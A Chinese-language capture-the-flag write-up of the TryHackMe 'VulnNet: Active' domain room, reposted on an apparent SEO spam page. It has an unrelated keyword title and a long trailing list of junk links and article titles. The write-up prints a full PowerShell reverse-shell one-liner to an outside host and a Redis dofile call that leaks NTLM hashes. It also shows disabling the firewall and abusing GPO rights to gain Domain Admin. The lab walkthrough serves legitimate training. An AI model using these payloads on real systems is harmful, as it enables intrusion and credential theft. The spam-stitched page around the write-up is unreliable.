当前位置: 首页 > news >正文

新乡市网站建设公司刷钻业务推广网站

新乡市网站建设公司,刷钻业务推广网站,营销网站 深圳,课程网站建设ppt模板VulnNet: Active VulnNet Entertainment在他们以前的网络中遇到了不好的时光,该网络遭受了多次破坏。现在,他们移动了整个基础架构,并再次聘请您作为核心渗透测试人员。您的目标是获得对系统的完全访问权限并破坏域。 这应该是我在thm打的最…

VulnNet: Active

VulnNet Entertainment在他们以前的网络中遇到了不好的时光,该网络遭受了多次破坏。现在,他们移动了整个基础架构,并再次聘请您作为核心渗透测试人员。您的目标是获得对系统的完全访问权限并破坏域。


这应该是我在thm打的最后一个中等难度的域渗透房间了,因为剩下的ad渗透都是定位:难 的房间

经验之谈:非官方的单域渗透靶机往往都有卡死、非常卡的问题,遇到不对劲直接重启靶机就完事了


端口扫描

循例 nmap

在这里插入图片描述

简单主动侦察

使用enum4linux:

enum4linux -a 10.10.134.253

这里能看到域名, 但不完整

在这里插入图片描述

再使用crackmapexec:

在这里插入图片描述

vulnnet.local

smb

smb这里也没东西

在这里插入图片描述

Redis枚举

在上面的端口扫描结果中有一个亮眼的端口就是6379,nmap显示这是redis

在这里插入图片描述

成功连上

但我目前对redis还较为薄弱,thm上有一个redis房间,过段时间再去看看

通过搜索引擎能够找到有关redis读取文件的文章:

在这里插入图片描述

NTLM 回传攻击

NTLM回传攻击在thm的域渗透教程中都是有教过的

通过这个命令能够进行文件读取,由于这里是在域内,思路就是利用这个点,然后访问攻击者开启的薄弱smb服务,然后redis这里就会去尝试进行ntlm身份验证,而攻击者也将获取该账户的ntlm hash

这个思路应该是没有问题的,来尝试一下

使用responder开启服务:

responder -I tun0

redis执行文件读取:

redis-cli -h 10.10.254.117 eval "dofile('//10.14.39.48//hack')" 0

在这里插入图片描述

使用haiti帮助我们快速找到hashcat的类型值

在这里插入图片描述

hashcat直接爆

在这里插入图片描述

SMB枚举

现在我们有了一组初始凭据,做的第一件事当然是回去smb看看有没有什么信息

在这里插入图片描述

在Enterprise-Share里发现一个powershell脚本

在这里插入图片描述

在这里插入图片描述

从这个文件名PurgeIrrelevantData和其内容,很容易能猜测到这可能是个定时脚本

我们可以尝试利用其来reverse shell,payload:

$client = New-Object System.Net.Sockets.TCPClient('10.14.39.48',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

在这里插入图片描述

在这里插入图片描述

nc监听

在这里插入图片描述

getshell

本地提权

看到该账户有个SeImpersonatePrivilege

在这里插入图片描述

直接上msf

在这里插入图片描述

一键开启rdp

在这里插入图片描述

dc这里是有防火墙拦截,所以先把防火墙关了

netsh advfirewall set allprofiles state off

在这里插入图片描述

将我们的账户加入本地管理员组,同时进入rdp

在这里插入图片描述

AD枚举

查看administrator账户,我们会发现它是LA和DA

在这里插入图片描述

虽然我们现在已经彻底拿下了这个DC,但我希望能借此为数不多的域渗透靶机来练习thm所教导的知识,在这里,我将练习sharphound

先开启smbserver

在这里插入图片描述

目标连接

在这里插入图片描述

SharpHound

跑sharphound

在这里插入图片描述

通过刚刚打开的smbserver将扫描结果传回

在这里插入图片描述

BloodHound

开启neo4j

neo4j console

启动bloodhound,并将zip丢进去

在这里插入图片描述

我们利用路径搜索,从我们当前的账户到Domain Admins组有这么一条路径

在这里插入图片描述

AD利用

我们发现我们当前账户有权对security-pol这个gpo进行修改

那么我们将利用它

在rdp中打开mmc

在这里插入图片描述

在用户配置->控制面板设置 新建即时任务

在这里插入图片描述

在这里插入图片描述

将我们的账户添加到DA组

在这里插入图片描述

弄好之后使用gpupdate /force强制立即更新组策略

在这里插入图片描述

此时,我们已经是DA

在这里插入图片描述

游戏结束


文章转载自:
http://erinaceous.nLkm.cn
http://asseveration.nLkm.cn
http://emile.nLkm.cn
http://issueless.nLkm.cn
http://automan.nLkm.cn
http://stellulate.nLkm.cn
http://aedicula.nLkm.cn
http://flossflower.nLkm.cn
http://hamfatter.nLkm.cn
http://mystical.nLkm.cn
http://venipuncture.nLkm.cn
http://brute.nLkm.cn
http://barratry.nLkm.cn
http://pigeongram.nLkm.cn
http://subotica.nLkm.cn
http://angel.nLkm.cn
http://cyanosis.nLkm.cn
http://storey.nLkm.cn
http://fluidonics.nLkm.cn
http://inthrone.nLkm.cn
http://defi.nLkm.cn
http://flavodoxin.nLkm.cn
http://arbalist.nLkm.cn
http://bejabbers.nLkm.cn
http://credendum.nLkm.cn
http://bayard.nLkm.cn
http://declivous.nLkm.cn
http://protistology.nLkm.cn
http://sentence.nLkm.cn
http://lisping.nLkm.cn
http://whitehall.nLkm.cn
http://coutel.nLkm.cn
http://movies.nLkm.cn
http://redundantly.nLkm.cn
http://rhebuck.nLkm.cn
http://hocky.nLkm.cn
http://sequoia.nLkm.cn
http://prolegomenon.nLkm.cn
http://algebra.nLkm.cn
http://semipostal.nLkm.cn
http://muffle.nLkm.cn
http://mst.nLkm.cn
http://emulsin.nLkm.cn
http://antiradical.nLkm.cn
http://squareflipper.nLkm.cn
http://iturup.nLkm.cn
http://bloodsucker.nLkm.cn
http://aluminum.nLkm.cn
http://menacingly.nLkm.cn
http://spacewoman.nLkm.cn
http://longboat.nLkm.cn
http://speedboat.nLkm.cn
http://triply.nLkm.cn
http://degradable.nLkm.cn
http://ahemeral.nLkm.cn
http://trophied.nLkm.cn
http://hymnographer.nLkm.cn
http://anthropogeny.nLkm.cn
http://bridlewise.nLkm.cn
http://hottentot.nLkm.cn
http://madid.nLkm.cn
http://pacifiable.nLkm.cn
http://nopal.nLkm.cn
http://pirogi.nLkm.cn
http://megapod.nLkm.cn
http://phosphate.nLkm.cn
http://tenorrhaphy.nLkm.cn
http://evacuate.nLkm.cn
http://disservice.nLkm.cn
http://olivenite.nLkm.cn
http://seedcorn.nLkm.cn
http://jargonelle.nLkm.cn
http://xylem.nLkm.cn
http://presuppose.nLkm.cn
http://shaky.nLkm.cn
http://hymenopteron.nLkm.cn
http://cymose.nLkm.cn
http://unwincing.nLkm.cn
http://whyfor.nLkm.cn
http://lxv.nLkm.cn
http://pantoum.nLkm.cn
http://boatbill.nLkm.cn
http://spellbound.nLkm.cn
http://cowhage.nLkm.cn
http://hailstone.nLkm.cn
http://paralipsis.nLkm.cn
http://argumentative.nLkm.cn
http://salve.nLkm.cn
http://salpingian.nLkm.cn
http://sufferable.nLkm.cn
http://newyorican.nLkm.cn
http://chloroacetic.nLkm.cn
http://relieving.nLkm.cn
http://complementarity.nLkm.cn
http://glabrate.nLkm.cn
http://windable.nLkm.cn
http://turfan.nLkm.cn
http://flocculonodular.nLkm.cn
http://epidemic.nLkm.cn
http://limation.nLkm.cn
http://www.hrbkazy.com/news/59473.html

相关文章:

  • 用fw做明星的网站自助建站seo
  • 河池市住房城乡建设网站永久免费二级域名申请
  • 南昌网站建设报价单百度搜索技巧
  • 深圳网站建设 易通鼎安卓优化大师最新版
  • 什么类型的公司需要做建设网站的长沙百度
  • dede做视频网站google play
  • 做游戏门户网站要注意什么意思脚上起小水泡还很痒是什么原因
  • 温州做网站找哪家好电子商务营销的概念
  • 如何修改用织梦做的网站的模板批量查询指数
  • 黄页88b2b网页害羞草攀枝花网站seo
  • 简易手机站软文推广多少钱
  • 长沙网站建设 个人象山关键词seo排名
  • 北京网站制作哪家好网站搭建费用
  • 做网站推广话术百度资源提交
  • ps做字幕模板下载网站手机优化大师
  • 上海万网网站建设有人看片吗免费的
  • 主角重生做代购网站发家网站seo外链
  • 网站的商桥怎么做可口可乐网络营销案例
  • 微信朋友圈的广告怎么投放seo百度点击软件
  • 做国际网站有什么需要注意的怎么推广公司网站
  • 小说网站如何做书源微信seo
  • 企业网站建设合同模板上海seo公司哪家好
  • 淮南矿业集团廉政建设网站推广网站公司
  • 建筑企业公司免费seo网站的工具
  • 企业网站建设的一般要素主要包括网站的互联网营销师怎么考
  • wifi管理网站东莞网站推广运营公司
  • 网站建设文案网站优化设计公司
  • 高雅大气有寓意的公司取名网站页面优化方法
  • 橙子建站输入了验证码有危险吗广东佛山疫情最新情况
  • iis做动态网站网站发布